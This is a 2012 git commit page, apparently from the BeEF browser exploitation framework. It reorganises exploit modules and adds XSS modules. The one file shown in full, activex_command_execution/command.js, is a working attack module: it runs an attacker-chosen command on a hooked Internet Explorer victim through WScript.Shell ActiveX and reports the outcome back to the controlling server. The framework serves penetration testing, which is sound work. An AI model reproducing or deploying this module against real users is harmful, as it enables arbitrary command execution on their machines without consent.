Moved a few modules from modules/exploits/ to modules/exploits/local_host:

activex_command_execution mozilla_nsiprocess_interface window_mail_client_dos java_payload safari_launch_app Added a couple of XSS modules: cisco_collaboration_server_5_xss serendipity_1.6_xss
2012-06-24 03:10:54 +09:30
parent aefc693548
commit 40f8b528aa
23 changed files with 173 additions and 5 deletions
--- a/modules/exploits/local_host/activex_command_execution/command.js
+++ b/modules/exploits/local_host/activex_command_execution/command.js
@@ -0,0 +1,34 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+
+	var cmd = '<%= @cmd.gsub(/'/, "\\'") %>';
+	var result = "command was not sent";
+
+	try {
+		var shell = new ActiveXObject('WSCRIPT.Shell').Run(cmd);
+		if (shell.toString() == 0) {
+			result = "command sent";
+		} else {
+			result = "command failed";
+		}
+	} catch(e) {
+		result = "command failed";
+	}
+
+	beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+result);
+
+});